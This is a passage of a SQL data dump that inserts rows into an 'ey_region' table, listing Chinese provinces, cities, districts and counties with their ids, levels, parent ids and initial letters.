INSERT INTO `ey_region` VALUES ('2851', '安次区', '3', '2849', 'A');
INSERT INTO `ey_region` VALUES ('2862', '广阳区', '3', '2849', 'G');
INSERT INTO `ey_region` VALUES ('2873', '固安县', '3', '2849', 'G');
INSERT INTO `ey_region` VALUES ('2883', '永清县', '3', '2849', 'Y');
INSERT INTO `ey_region` VALUES ('2895', '香河县', '3', '2849', 'X');
INSERT INTO `ey_region` VALUES ('2906', '大城县', '3', '2849', 'D');
INSERT INTO `ey_region` VALUES ('2918', '文安县', '3', '2849', 'W');
INSERT INTO `ey_region` VALUES ('2932', '大厂县', '3', '2849', 'D');
INSERT INTO `ey_region` VALUES ('2939', '霸州市', '3', '2849', 'B');
INSERT INTO `ey_region` VALUES ('2953', '三河市', '3', '2849', 'S');
INSERT INTO `ey_region` VALUES ('2968', '衡水市', '2', '636', 'H');
INSERT INTO `ey_region` VALUES ('2969', '市辖区', '3', '2968', 'S');
INSERT INTO `ey_region` VALUES ('2970', '桃城区', '3', '2968', 'T');
INSERT INTO `ey_region` VALUES ('2983', '枣强县', '3', '2968', 'Z');
INSERT INTO `ey_region` VALUES ('2995', '武邑县', '3', '2968', 'W');
INSERT INTO `ey_region` VALUES ('3005', '武强县', '3', '2968', 'W');
INSERT INTO `ey_region` VALUES ('3012', '饶阳县', '3', '2968', 'R');
INSERT INTO `ey_region` VALUES ('3020', '安平县', '3', '2968', 'A');
INSERT INTO `ey_region` VALUES ('3029', '故城县', '3', '2968', 'G');
INSERT INTO `ey_region` VALUES ('3043', '景县', '3', '2968', 'J');
INSERT INTO `ey_region` VALUES ('3060', '阜城县', '3', '2968', 'F');
INSERT INTO `ey_region` VALUES ('3071', '冀州市', '3', '2968', 'J');
INSERT INTO `ey_region` VALUES ('3083', '深州市', '3', '2968', 'S');
INSERT INTO `ey_region` VALUES ('3102', '山西省', '1', '0', 'S');
INSERT INTO `ey_region` VALUES ('3103', '太原市', '2', '3102', 'T');
INSERT INTO `ey_region` VALUES ('3104', '市辖区', '3', '3103', 'S');
INSERT INTO `ey_region` VALUES ('3105', '小店区(人口含高新经济区)', '3', '3103', 'X');
INSERT INTO `ey_region` VALUES ('3117', '迎泽区', '3', '3103', 'Y');
INSERT INTO `ey_region` VALUES ('3126', '杏花岭区', '3', '3103', 'X');
INSERT INTO `ey_region` VALUES ('3140', '尖草坪区', '3', '3103', 'J');
INSERT INTO `ey_region` VALUES ('3155', '万柏林区', '3', '3103', 'W');
INSERT INTO `ey_region` VALUES ('3171', '晋源区', '3', '3103', 'J');
INSERT INTO `ey_region` VALUES ('3178', '清徐县', '3', '3103', 'Q');
INSERT INTO `ey_region` VALUES ('3188', '阳曲县', '3', '3103', 'Y');
INSERT INTO `ey_region` VALUES ('3200', '娄烦县', '3', '3103', 'L');
INSERT INTO `ey_region` VALUES ('3209', '古交市', '3', '3103', 'G');
INSERT INTO `ey_region` VALUES ('3224', '大同市', '2', '3102', 'D');
INSERT INTO `ey_region` VALUES ('3225', '市辖区', '3', '3224', 'S');
INSERT INTO `ey_region` VALUES ('3226', '大同市城区', '3', '3224', 'D');
INSERT INTO `ey_region` VALUES ('3241', '矿区', '3', '3224', 'K');
INSERT INTO `ey_region` VALUES ('3266', '南郊区', '3', '3224', 'N');
INSERT INTO `ey_region` VALUES ('3277', '新荣区', '3', '3224', 'X');
INSERT INTO `ey_region` VALUES ('3286', '阳高县', '3', '3224', 'Y');
INSERT INTO `ey_region` VALUES ('3300', '天镇县', '3', '3224', 'T');
INSERT INTO `ey_region` VALUES ('3312', '广灵县', '3', '3224', 'G');
INSERT INTO `ey_region` VALUES ('3322', '灵丘县', '3', '3224', 'L');
INSERT INTO `ey_region` VALUES ('3335', '浑源县', '3', '3224', 'H');
INSERT INTO `ey_region` VALUES ('3354', '左云县', '3', '3224', 'Z');
INSERT INTO `ey_region` VALUES ('3364', '大同县', '3', '3224', 'D');
INSERT INTO `ey_region` VALUES ('3379', '阳泉市', '2', '3102', 'Y');
INSERT INTO `ey_region` VALUES ('3380', '市辖区', '3', '3379', 'S');
INSERT INTO `ey_region` VALUES ('3381', '城区', '3', '3379', 'C');
INSERT INTO `ey_region` VALUES ('3388', '矿区', '3', '3379', 'K');
INSERT INTO `ey_region` VALUES ('3395', '郊区', '3', '3379', 'J');
INSERT INTO `ey_region` VALUES ('3405', '平定县', '3', '3379', 'P');
INSERT INTO `ey_region` VALUES ('3416', '盂县', '3', '3379', 'Y');
INSERT INTO `ey_region` VALUES ('3431', '长治市', '2', '3102', 'C');
INSERT INTO `ey_region` VALUES ('3432', '市辖区', '3', '3431', 'S');
INSERT INTO `ey_region` VALUES ('3433', '长治市城区', '3', '3431', 'C');
INSERT INTO `ey_region` VALUES ('3445', '长治市郊区', '3', '3431', 'C');
INSERT INTO `ey_region` VALUES ('3454', '长治县', '3', '3431', 'C');
INSERT INTO `ey_region` VALUES ('3466', '襄垣县', '3', '3431', 'X');
INSERT INTO `ey_region` VALUES ('3478', '屯留县', '3', '3431', 'T');
INSERT INTO `ey_region` VALUES ('3493', '平顺县', '3', '3431', 'P');
INSERT INTO `ey_region` VALUES ('3506', '黎城县', '3', '3431', 'L');
INSERT INTO `ey_region` VALUES ('3516', '壶关县', '3', '3431', 'H');
INSERT INTO `ey_region` VALUES ('3530', '长子县', '3', '3431', 'C');
INSERT INTO `ey_region` VALUES ('3543', '武乡县', '3', '3431', 'W');
INSERT INTO `ey_region` VALUES ('3558', '沁县', '3', '3431', 'Q');
INSERT INTO `ey_region` VALUES ('3572', '沁源县', '3', '3431', 'Q');
INSERT INTO `ey_region` VALUES ('3587', '潞城市', '3', '3431', 'L');
INSERT INTO `ey_region` VALUES ('3597', '晋城市', '2', '3102', 'J');
INSERT INTO `ey_region` VALUES ('3598', '市辖区', '3', '3597', 'S');
INSERT INTO `ey_region` VALUES ('3599', '晋城市城区', '3', '3597', 'J');
INSERT INTO `ey_region` VALUES ('3608', '沁水县', '3', '3597', 'Q');
INSERT INTO `ey_region` VALUES ('3623', '阳城县', '3', '3597', 'Y');
INSERT INTO `ey_region` VALUES ('3642', '陵川县', '3', '3597', 'L');
INSERT INTO `ey_region` VALUES ('3655', '泽州县', '3', '3597', 'Z');
INSERT INTO `ey_region` VALUES ('3673', '高平市', '3', '3597', 'G');
INSERT INTO `ey_region` VALUES ('3690', '朔州市', '2', '3102', 'S');
INSERT INTO `ey_region` VALUES ('3691', '市辖区', '3', '3690', 'S');
INSERT INTO `ey_region` VALUES ('3692', '朔城区', '3', '3690', 'S');
INSERT INTO `ey_region` VALUES ('3709', '平鲁区', '3', '3690', 'P');
INSERT INTO `ey_region` VALUES ('3723', '山阴县', '3', '3690', 'S');
INSERT INTO `ey_region` VALUES ('3739', '应县', '3', '3690', 'Y');
INSERT INTO `ey_region` VALUES ('3752', '右玉县', '3', '3690', 'Y');
INSERT INTO `ey_region` VALUES ('3763', '怀仁县', '3', '3690', 'H');
INSERT INTO `ey_region` VALUES ('3776', '晋中市', '2', '3102', 'J');
INSERT INTO `ey_region` VALUES ('3777', '市辖区', '3', '3776', 'S');
INSERT INTO `ey_region` VALUES ('3778', '榆次区', '3', '3776', 'Y');
INSERT INTO `ey_region` VALUES ('3799', '榆社县', '3', '3776', 'Y');
INSERT INTO `ey_region` VALUES ('3810', '左权县', '3', '3776', 'Z');
INSERT INTO `ey_region` VALUES ('3822', '和顺县', '3', '3776', 'H');
INSERT INTO `ey_region` VALUES ('3833', '昔阳县', '3', '3776', 'X');
INSERT INTO `ey_region` VALUES ('3846', '寿阳县', '3', '3776', 'S');
INSERT INTO `ey_region` VALUES ('3861', '太谷县', '3', '3776', 'T');
INSERT INTO `ey_region` VALUES ('3871', '祁县', '3', '3776', 'Q');
INSERT INTO `ey_region` VALUES ('3880', '平遥县', '3', '3776', 'P');
INSERT INTO `ey_region` VALUES ('3895', '灵石县', '3', '3776', 'L');
INSERT INTO `ey_region` VALUES ('3908', '介休市', '3', '3776', 'J');
INSERT INTO `ey_region` VALUES ('3925', '运城市', '2', '3102', 'Y');
INSERT INTO `ey_region` VALUES ('3926', '市辖区', '3', '3925', 'S');
INSERT INTO `ey_region` VALUES ('3927', '盐湖区', '3', '3925', 'Y');
INSERT INTO `ey_region` VALUES ('3950', '临猗县', '3', '3925', 'L');
INSERT INTO `ey_region` VALUES ('3967', '万荣县', '3', '3925', 'W');
INSERT INTO `ey_region` VALUES ('3982', '闻喜县', '3', '3925', 'W');
INSERT INTO `ey_region` VALUES ('3996', '稷山县', '3', '3925', 'J');
INSERT INTO `ey_region` VALUES ('4004', '新绛县', '3', '3925', 'X');
INSERT INTO `ey_region` VALUES ('4013', '绛县', '3', '3925', 'J');
INSERT INTO `ey_region` VALUES ('4024', '垣曲县', '3', '3925', 'Y');
INSERT INTO `ey_region` VALUES ('4036', '夏县', '3', '3925', 'X');
INSERT INTO `ey_region` VALUES ('4048', '平陆县', '3', '3925', 'P');
INSERT INTO `ey_region` VALUES ('4059', '芮城县', '3', '3925', 'R');
INSERT INTO `ey_region` VALUES ('4070', '永济市', '3', '3925', 'Y');
INSERT INTO `ey_region` VALUES ('4082', '河津市', '3', '3925', 'H');
INSERT INTO `ey_region` VALUES ('4093', '忻州市', '2', '3102', 'X');
INSERT INTO `ey_region` VALUES ('4094', '市辖区', '3', '4093', 'S');
INSERT INTO `ey_region` VALUES ('4095', '忻府区', '3', '4093', 'X');
INSERT INTO `ey_region` VALUES ('4116', '定襄县', '3', '4093', 'D');
INSERT INTO `ey_region` VALUES ('4126', '五台县', '3', '4093', 'W');
INSERT INTO `ey_region` VALUES ('4146', '代县', '3', '4093', 'D');
INSERT INTO `ey_region` VALUES ('4158', '繁峙县', '3', '4093', 'F');
INSERT INTO `ey_region` VALUES ('4172', '宁武县', '3', '4093', 'N');
INSERT INTO `ey_region` VALUES ('4189', '静乐县', '3', '4093', 'J');
INSERT INTO `ey_region` VALUES ('4204', '神池县', '3', '4093', 'S');
INSERT INTO `ey_region` VALUES ('4215', '五寨县', '3', '4093', 'W');
INSERT INTO `ey_region` VALUES ('4228', '岢岚县', '3', '4093', 'K');
INSERT INTO `ey_region` VALUES ('4241', '河曲县', '3', '4093', 'H');
INSERT INTO `ey_region` VALUES ('4255', '保德县', '3', '4093', 'B');
INSERT INTO `ey_region` VALUES ('4269', '偏关县', '3', '4093', 'P');
INSERT INTO `ey_region` VALUES ('4280', '原平市', '3', '4093', 'Y');
INSERT INTO `ey_region` VALUES ('4304', '临汾市', '2', '3102', 'L');
INSERT INTO `ey_region` VALUES ('4305', '市辖区', '3', '4304', 'S');
INSERT INTO `ey_region` VALUES ('4306', '尧都区', '3', '4304', 'Y');
INSERT INTO `ey_region` VALUES ('4333', '曲沃县', '3', '4304', 'Q');
INSERT INTO `ey_region` VALUES ('4341', '翼城县', '3', '4304', 'Y');
INSERT INTO `ey_region` VALUES ('4352', '襄汾县', '3', '4304', 'X');
INSERT INTO `ey_region` VALUES ('4366', '洪洞县', '3', '4304', 'H');
INSERT INTO `ey_region` VALUES ('4383', '古县', '3', '4304', 'G');
INSERT INTO `ey_region` VALUES ('4391', '安泽县', '3', '4304', 'A');
INSERT INTO `ey_region` VALUES ('4399', '浮山县', '3', '4304', 'F');
INSERT INTO `ey_region` VALUES ('4409', '吉县', '3', '4304', 'J');
INSERT INTO `ey_region` VALUES ('4418', '乡宁县', '3', '4304', 'X');
INSERT INTO `ey_region` VALUES ('4429', '大宁县', '3', '4304', 'D');
INSERT INTO `ey_region` VALUES ('4436', '隰县', '3', '4304', 'X');
INSERT INTO `ey_region` VALUES ('4445', '永和县', '3', '4304', 'Y');
INSERT INTO `ey_region` VALUES ('4453', '蒲县', '3', '4304', 'P');
INSERT INTO `ey_region` VALUES ('4463', '汾西县', '3', '4304', 'F');
INSERT INTO `ey_region` VALUES ('4472', '侯马市', '3', '4304', 'H');
INSERT INTO `ey_region` VALUES ('4481', '霍州市', '3', '4304', 'H');
INSERT INTO `ey_region` VALUES ('4494', '吕梁市', '2', '3102', 'L');
INSERT INTO `ey_region` VALUES ('4495', '市辖区', '3', '4494', 'S');
INSERT INTO `ey_region` VALUES ('4496', '离石区', '3', '4494', 'L');
INSERT INTO `ey_region` VALUES ('4509', '文水县', '3', '4494', 'W');
INSERT INTO `ey_region` VALUES ('4522', '交城县', '3', '4494', 'J');
INSERT INTO `ey_region` VALUES ('4533', '兴县', '3', '4494', 'X');
INSERT INTO `ey_region` VALUES ('4551', '临县', '3', '4494', 'L');
INSERT INTO `ey_region` VALUES ('4575', '柳林县', '3', '4494', 'L');
INSERT INTO `ey_region` VALUES ('4591', '石楼县', '3', '4494', 'S');
INSERT INTO `ey_region` VALUES ('4601', '岚县', '3', '4494', 'L');
INSERT INTO `ey_region` VALUES ('4614', '方山县', '3', '4494', 'F');
INSERT INTO `ey_region` VALUES ('4622', '中阳县', '3', '4494', 'Z');
INSERT INTO `ey_region` VALUES ('4630', '交口县', '3', '4494', 'J');
INSERT INTO `ey_region` VALUES ('4638', '孝义市', '3', '4494', 'X');
INSERT INTO `ey_region` VALUES ('4655', '汾阳市', '3', '4494', 'F');
INSERT INTO `ey_region` VALUES ('4670', '内蒙古自治区', '1', '0', 'N');
INSERT INTO `ey_region` VALUES ('4671', '呼和浩特市', '2', '4670', 'H');
INSERT INTO `ey_region` VALUES ('4672', '市辖区', '3', '4671', 'S');
INSERT INTO `ey_region` VALUES ('4673', '新城区', '3', '4671', 'X');
INSERT INTO `ey_region` VALUES ('4684', '回民区', '3', '4671', 'H');
INSERT INTO `ey_region` VALUES ('4693', '玉泉区', '3', '4671', 'Y');
INSERT INTO `ey_region` VALUES ('4702', '赛罕区', '3', '4671', 'S');
INSERT INTO `ey_region` VALUES ('4715', '土左旗', '3', '4671', 'T');
INSERT INTO `ey_region` VALUES ('4727', '托克托县', '3', '4671', 'T');
INSERT INTO `ey_region` VALUES ('4733', '和林格尔县', '3', '4671', 'H');
INSERT INTO `ey_region` VALUES ('4742', '清水河县', '3', '4671', 'Q');
INSERT INTO `ey_region` VALUES ('4749', '武川县', '3', '4671', 'W');
INSERT INTO `ey_region` VALUES ('4759', '包头市', '2', '4670', 'B');
INSERT INTO `ey_region` VALUES ('4760', '市辖区', '3', '4759', 'S');
INSERT INTO `ey_region` VALUES ('4761', '东河区', '3', '4759', 'D');
INSERT INTO `ey_region` VALUES ('4775', '昆都仑区', '3', '4759', 'K');
INSERT INTO `ey_region` VALUES ('4791', '青山区', '3', '4759', 'Q');
INSERT INTO `ey_region` VALUES ('4803', '石拐区', '3', '4759', 'S');
INSERT INTO `ey_region` VALUES ('4810', '白云鄂博矿区', '3', '4759', 'B');
INSERT INTO `ey_region` VALUES ('4813', '九原区', '3', '4759', 'J');
INSERT INTO `ey_region` VALUES ('4823', '土默特右旗', '3', '4759', 'T');
INSERT INTO `ey_region` VALUES ('4833', '固阳县', '3', '4759', 'G');
INSERT INTO `ey_region` VALUES ('4840', '达茂联合旗', '3', '4759', 'D');
INSERT INTO `ey_region` VALUES ('4849', '乌海市', '2', '4670', 'W');
INSERT INTO `ey_region` VALUES ('4850', '乌海市辖区', '3', '4849', 'W');
INSERT INTO `ey_region` VALUES ('4851', '海勃湾区', '3', '4849', 'H');
INSERT INTO `ey_region` VALUES ('4859', '海南区', '3', '4849', 'H');
INSERT INTO `ey_region` VALUES ('4865', '乌达区', '3', '4849', 'W');
INSERT INTO `ey_region` VALUES ('4874', '赤峰市', '2', '4670', 'C');
INSERT INTO `ey_region` VALUES ('4875', '市辖区', '3', '4874', 'S');
INSERT INTO `ey_region` VALUES ('4876', '红山区', '3', '4874', 'H');
INSERT INTO `ey_region` VALUES ('4888', '元宝山区', '3', '4874', 'Y');
INSERT INTO `ey_region` VALUES ('4896', '松山区', '3', '4874', 'S');
INSERT INTO `ey_region` VALUES ('4919', '阿鲁科尔沁旗', '3', '4874', 'A');
INSERT INTO `ey_region` VALUES ('4932', '巴林左旗', '3', '4874', 'B');
INSERT INTO `ey_region` VALUES ('4944', '巴林右旗', '3', '4874', 'B');
INSERT INTO `ey_region` VALUES ('4953', '林西县', '3', '4874', 'L');
INSERT INTO `ey_region` VALUES ('4963', '克什克腾旗', '3', '4874', 'K');
INSERT INTO `ey_region` VALUES ('4975', '翁牛特旗', '3', '4874', 'W');
INSERT INTO `ey_region` VALUES ('4988', '喀喇沁旗', '3', '4874', 'K');
INSERT INTO `ey_region` VALUES ('4999', '宁城县', '3', '4874', 'N');
INSERT INTO `ey_region` VALUES ('5013', '敖汉旗', '3', '4874', 'A');
INSERT INTO `ey_region` VALUES ('5029', '通辽市', '2', '4670', 'T');
INSERT INTO `ey_region` VALUES ('5030', '市辖区', '3', '5029', 'S');
INSERT INTO `ey_region` VALUES ('5031', '科尔沁区', '3', '5029', 'K');
INSERT INTO `ey_region` VALUES ('5062', '科尔沁左翼中旗', '3', '5029', 'K');
INSERT INTO `ey_region` VALUES ('5079', '科左后旗', '3', '5029', 'K');
INSERT INTO `ey_region` VALUES ('5104', '开鲁县', '3', '5029', 'K');
INSERT INTO `ey_region` VALUES ('5118', '库伦旗', '3', '5029', 'K');
INSERT INTO `ey_region` VALUES ('5125', '奈曼旗', '3', '5029', 'N');
INSERT INTO `ey_region` VALUES ('5139', '扎鲁特旗', '3', '5029', 'Z');
INSERT INTO `ey_region` VALUES ('5155', '霍林郭勒市', '3', '5029', 'H');
INSERT INTO `ey_region` VALUES ('5162', '鄂尔多斯市', '2', '4670', 'E');
INSERT INTO `ey_region` VALUES ('5163', '东胜区', '3', '5162', 'D');
INSERT INTO `ey_region` VALUES ('5176', '达拉特旗', '3', '5162', 'D');
INSERT INTO `ey_region` VALUES ('5185', '准格尔旗', '3', '5162', 'Z');
INSERT INTO `ey_region` VALUES ('5195', '鄂托克前旗', '3', '5162', 'E');
INSERT INTO `ey_region` VALUES ('5201', '鄂托克旗', '3', '5162', 'E');
INSERT INTO `ey_region` VALUES ('5210', '杭锦旗', '3', '5162', 'H');
INSERT INTO `ey_region` VALUES ('5219', '乌审旗', '3', '5162', 'W');
INSERT INTO `ey_region` VALUES ('5228', '伊金霍洛旗', '3', '5162', 'Y');
INSERT INTO `ey_region` VALUES ('5236', '呼伦贝尔市', '2', '4670', 'H');
INSERT INTO `ey_region` VALUES ('5237', '市辖区', '3', '5236', 'S');
INSERT INTO `ey_region` VALUES ('5238', '海拉尔区', '3', '5236', 'H');
INSERT INTO `ey_region` VALUES ('5249', '阿荣旗', '3', '5236', 'A');
INSERT INTO `ey_region` VALUES ('5262', '莫力达瓦旗', '3', '5236', 'M');
INSERT INTO `ey_region` VALUES ('5277', '鄂伦春旗', '3', '5236', 'E');
INSERT INTO `ey_region` VALUES ('5303', '鄂温旗', '3', '5236', 'E');
INSERT INTO `ey_region` VALUES ('5314', '陈巴尔虎旗镇', '3', '5236', 'C');
INSERT INTO `ey_region` VALUES ('5323', '新巴尔虎左旗', '3', '5236', 'X');
INSERT INTO `ey_region` VALUES ('5330', '新巴尔虎右旗', '3', '5236', 'X');
INSERT INTO `ey_region` VALUES ('5337', '满洲里市', '3', '5236', 'M');
INSERT INTO `ey_region` VALUES ('5354', '牙克石市', '3', '5236', 'Y');
INSERT INTO `ey_region` VALUES ('5371', '扎兰屯市', '3', '5236', 'Z');
INSERT INTO `ey_region` VALUES ('5397', '额尔古纳市', '3', '5236', 'E');
INSERT INTO `ey_region` VALUES ('5410', '根河市', '3', '5236', 'G');
INSERT INTO `ey_region` VALUES ('5418', '巴彦淖尔市', '2', '4670', 'B');
INSERT INTO `ey_region` VALUES ('5419', '市辖区', '3', '5418', 'S');
INSERT INTO `ey_region` VALUES ('5420', '临河区', '3', '5418', 'L');
INSERT INTO `ey_region` VALUES ('5440', '五原县', '3', '5418', 'W');
INSERT INTO `ey_region` VALUES ('5450', '磴口县', '3', '5418', 'D');
INSERT INTO `ey_region` VALUES ('5461', '乌拉特前旗', '3', '5418', 'W');
INSERT INTO `ey_region` VALUES ('5477', '乌拉特中旗', '3', '5418', 'W');
INSERT INTO `ey_region` VALUES ('5489', '乌拉特后旗', '3', '5418', 'W');
INSERT INTO `ey_region` VALUES ('5495', '杭锦后旗', '3', '5418', 'H');
INSERT INTO `ey_region` VALUES ('5505', '乌兰察布市', '2', '4670', 'W');
INSERT INTO `ey_region` VALUES ('5506', '市辖区', '3', '5505', 'S');
INSERT INTO `ey_region` VALUES ('5507', '集宁区', '3', '5505', 'J');
INSERT INTO `ey_region` VALUES ('5518', '卓资县', '3', '5505', 'Z');
INSERT INTO `ey_region` VALUES ('5526', '化德县', '3', '5505', 'H');
INSERT INTO `ey_region` VALUES ('5532', '商都县', '3', '5505', 'S');
INSERT INTO `ey_region` VALUES ('5542', '兴和县', '3', '5505', 'X');
INSERT INTO `ey_region` VALUES ('5551', '凉城县', '3', '5505', 'L');
INSERT INTO `ey_region` VALUES ('5562', '察哈尔右翼前旗', '3', '5505', 'C');
INSERT INTO `ey_region` VALUES ('5571', '察右中旗', '3', '5505', 'C');
INSERT INTO `ey_region` VALUES ('5582', '察哈尔右翼后旗', '3', '5505', 'C');
INSERT INTO `ey_region` VALUES ('5590', '四子王旗', '3', '5505', 'S');
INSERT INTO `ey_region` VALUES ('5603', '丰镇市', '3', '5505', 'F');
INSERT INTO `ey_region` VALUES ('5616', '兴安盟', '2', '4670', 'X');
INSERT INTO `ey_region` VALUES ('5617', '乌兰浩特市', '3', '5616', 'W');
INSERT INTO `ey_region` VALUES ('5629', '阿尔山市', '3', '5616', 'A');
INSERT INTO `ey_region` VALUES ('5636', '科右前旗', '3', '5616', 'K');
INSERT INTO `ey_region` VALUES ('5655', '科右中旗', '3', '5616', 'K');
INSERT INTO `ey_region` VALUES ('5677', '扎赉特旗', '3', '5616', 'Z');
INSERT INTO `ey_region` VALUES ('5692', '突泉县', '3', '5616', 'T');
INSERT INTO `ey_region` VALUES ('5702', '锡林郭勒盟', '2', '4670', 'X');
INSERT INTO `ey_region` VALUES ('5703', '二连浩特市', '3', '5702', 'E');
INSERT INTO `ey_region` VALUES ('5709', '锡林浩特市', '3', '5702', 'X');
INSERT INTO `ey_region` VALUES ('5723', '阿巴嘎旗', '3', '5702', 'A');
INSERT INTO `ey_region` VALUES ('5731', '苏尼特左旗', '3', '5702', 'S');
INSERT INTO `ey_region` VALUES ('5738', '苏尼特右旗', '3', '5702', 'S');
INSERT INTO `ey_region` VALUES ('5745', '东乌珠穆沁旗', '3', '5702', 'D');
INSERT INTO `ey_region` VALUES ('5758', '西乌珠穆沁旗', '3', '5702', 'X');
INSERT INTO `ey_region` VALUES ('5766', '太仆寺旗', '3', '5702', 'T');
INSERT INTO `ey_region` VALUES ('5774', '镶黄旗', '3', '5702', 'X');
INSERT INTO `ey_region` VALUES ('5778', '正镶白旗', '3', '5702', 'Z');
INSERT INTO `ey_region` VALUES ('5785', '正蓝旗', '3', '5702', 'Z');
INSERT INTO `ey_region` VALUES ('5794', '多伦县', '3', '5702', 'D');
INSERT INTO `ey_region` VALUES ('5799', '阿拉善盟', '2', '4670', 'A');
INSERT INTO `ey_region` VALUES ('5800', '阿拉善左旗', '3', '5799', 'A');
INSERT INTO `ey_region` VALUES ('5814', '阿拉善右旗', '3', '5799', 'A');
INSERT INTO `ey_region` VALUES ('5820', '额济纳旗', '3', '5799', 'E');
INSERT INTO `ey_region` VALUES ('5827', '辽宁省', '1', '0', 'L');
INSERT INTO `ey_region` VALUES ('5828', '沈阳市', '2', '5827', 'S');
INSERT INTO `ey_region` VALUES ('5829', '市辖区', '3', '5828', 'S');
INSERT INTO `ey_region` VALUES ('5830', '和平区', '3', '5828', 'H');
INSERT INTO `ey_region` VALUES ('5848', '沈河区', '3', '5828', 'S');
INSERT INTO `ey_region` VALUES ('5859', '大东区', '3', '5828', 'D');
INSERT INTO `ey_region` VALUES ('5873', '皇姑区', '3', '5828', 'H');
INSERT INTO `ey_region` VALUES ('5894', '铁西区', '3', '5828', 'T');
INSERT INTO `ey_region` VALUES ('5909', '苏家屯区', '3', '5828', 'S');
INSERT INTO `ey_region` VALUES ('5934', '东陵区', '3', '5828', 'D');
INSERT INTO `ey_region` VALUES ('5954', '新城子区', '3', '5828', 'X');
INSERT INTO `ey_region` VALUES ('5975', '于洪区', '3', '5828', 'Y');
INSERT INTO `ey_region` VALUES ('5998', '辽中县', '3', '5828', 'L');
INSERT INTO `ey_region` VALUES ('6020', '康平县', '3', '5828', 'K');
INSERT INTO `ey_region` VALUES ('6038', '法库县', '3', '5828', 'F');
INSERT INTO `ey_region` VALUES ('6058', '新民市', '3', '5828', 'X');
INSERT INTO `ey_region` VALUES ('6088', '大连市', '2', '5827', 'D');
INSERT INTO `ey_region` VALUES ('6089', '市辖区', '3', '6088', 'S');
INSERT INTO `ey_region` VALUES ('6090', '中山区', '3', '6088', 'Z');
INSERT INTO `ey_region` VALUES ('6099', '西岗区', '3', '6088', 'X');
INSERT INTO `ey_region` VALUES ('6107', '沙河口区', '3', '6088', 'S');
INSERT INTO `ey_region` VALUES ('6117', '甘井子区', '3', '6088', 'G');
INSERT INTO `ey_region` VALUES ('6137', '旅顺口区', '3', '6088', 'L');
INSERT INTO `ey_region` VALUES ('6153', '金州区', '3', '6088', 'J');
INSERT INTO `ey_region` VALUES ('6178', '长海县', '3', '6088', 'C');
INSERT INTO `ey_region` VALUES ('6184', '瓦房店市', '3', '6088', 'W');
INSERT INTO `ey_region` VALUES ('6217', '普兰店市', '3', '6088', 'P');
INSERT INTO `ey_region` VALUES ('6239', '庄河市', '3', '6088', 'Z');
INSERT INTO `ey_region` VALUES ('6266', '鞍山市', '2', '5827', 'A');
INSERT INTO `ey_region` VALUES ('6267', '市辖区', '3', '6266', 'S');
INSERT INTO `ey_region` VALUES ('6268', '铁东区', '3', '6266', 'T');
INSERT INTO `ey_region` VALUES ('6282', '铁西区', '3', '6266', 'T');
INSERT INTO `ey_region` VALUES ('6293', '立山区', '3', '6266', 'L');
INSERT INTO `ey_region` VALUES ('6303', '千山区', '3', '6266', 'Q');
INSERT INTO `ey_region` VALUES ('6316', '台安县', '3', '6266', 'T');
INSERT INTO `ey_region` VALUES ('6331', '岫岩县', '3', '6266', 'X');
INSERT INTO `ey_region` VALUES ('6354', '海城市', '3', '6266', 'H');
INSERT INTO `ey_region` VALUES ('6384', '抚顺市', '2', '5827', 'F');
INSERT INTO `ey_region` VALUES ('6385', '市辖区', '3', '6384', 'S');
INSERT INTO `ey_region` VALUES ('6386', '新抚区', '3', '6384', 'X');
INSERT INTO `ey_region` VALUES ('6395', '东洲区', '3', '6384', 'D');
INSERT INTO `ey_region` VALUES ('6409', '望花区', '3', '6384', 'W');
INSERT INTO `ey_region` VALUES ('6422', '顺城区', '3', '6384', 'S');
INSERT INTO `ey_region` VALUES ('6432', '抚顺县', '3', '6384', 'F');
INSERT INTO `ey_region` VALUES ('6445', '新宾县', '3', '6384', 'X');
INSERT INTO `ey_region` VALUES ('6461', '清原县', '3', '6384', 'Q');
INSERT INTO `ey_region` VALUES ('6476', '本溪市', '2', '5827', 'B');
INSERT INTO `ey_region` VALUES ('6477', '市辖区', '3', '6476', 'S');
INSERT INTO `ey_region` VALUES ('6478', '平山区', '3', '6476', 'P');
INSERT INTO `ey_region` VALUES ('6488', '溪湖区', '3', '6476', 'X');
INSERT INTO `ey_region` VALUES ('6499', '明山区', '3', '6476', 'M');
INSERT INTO `ey_region` VALUES ('6509', '南芬区', '3', '6476', 'N');
INSERT INTO `ey_region` VALUES ('6515', '本溪县', '3', '6476', 'B');
INSERT INTO `ey_region` VALUES ('6528', '桓仁县', '3', '6476', 'H');
INSERT INTO `ey_region` VALUES ('6542', '丹东市', '2', '5827', 'D');
INSERT INTO `ey_region` VALUES ('6543', '市辖区', '3', '6542', 'S');
INSERT INTO `ey_region` VALUES ('6544', '元宝区', '3', '6542', 'Y');
INSERT INTO `ey_region` VALUES ('6552', '振兴区', '3', '6542', 'Z');
INSERT INTO `ey_region` VALUES ('6563', '振安区', '3', '6542', 'Z');
INSERT INTO `ey_region` VALUES ('6573', '宽甸县', '3', '6542', 'K');
INSERT INTO `ey_region` VALUES ('6596', '东港市', '3', '6542', 'D');
INSERT INTO `ey_region` VALUES ('6621', '凤城市', '3', '6542', 'F');
INSERT INTO `ey_region` VALUES ('6643', '锦州市', '2', '5827', 'J');
INSERT INTO `ey_region` VALUES ('6644', '市辖区', '3', '6643', 'S');
INSERT INTO `ey_region` VALUES ('6645', '古塔区', '3', '6643', 'G');
INSERT INTO `ey_region` VALUES ('6655', '凌河区', '3', '6643', 'L');
INSERT INTO `ey_region` VALUES ('6668', '太和区', '3', '6643', 'T');
INSERT INTO `ey_region` VALUES ('6683', '黑山县', '3', '6643', 'H');
INSERT INTO `ey_region` VALUES ('6706', '义县', '3', '6643', 'Y');
INSERT INTO `ey_region` VALUES ('6725', '凌海市', '3', '6643', 'L');
INSERT INTO `ey_region` VALUES ('6750', '北镇市', '3', '6643', 'B');
INSERT INTO `ey_region` VALUES ('6771', '营口市', '2', '5827', 'Y');
INSERT INTO `ey_region` VALUES ('6772', '市辖区', '3', '6771', 'S');
INSERT INTO `ey_region` VALUES ('6773', '站前区', '3', '6771', 'Z');
INSERT INTO `ey_region` VALUES ('6781', '西市区', '3', '6771', 'X');
INSERT INTO `ey_region` VALUES ('6789', '鲅鱼圈区', '3', '6771', 'B');
INSERT INTO `ey_region` VALUES ('6797', '老边区', '3', '6771', 'L');
INSERT INTO `ey_region` VALUES ('6804', '盖州市', '3', '6771', 'G');
INSERT INTO `ey_region` VALUES ('6832', '大石桥市', '3', '6771', 'D');
INSERT INTO `ey_region` VALUES ('6851', '阜新市', '2', '5827', 'F');
INSERT INTO `ey_region` VALUES ('6852', '市辖区', '3', '6851', 'S');
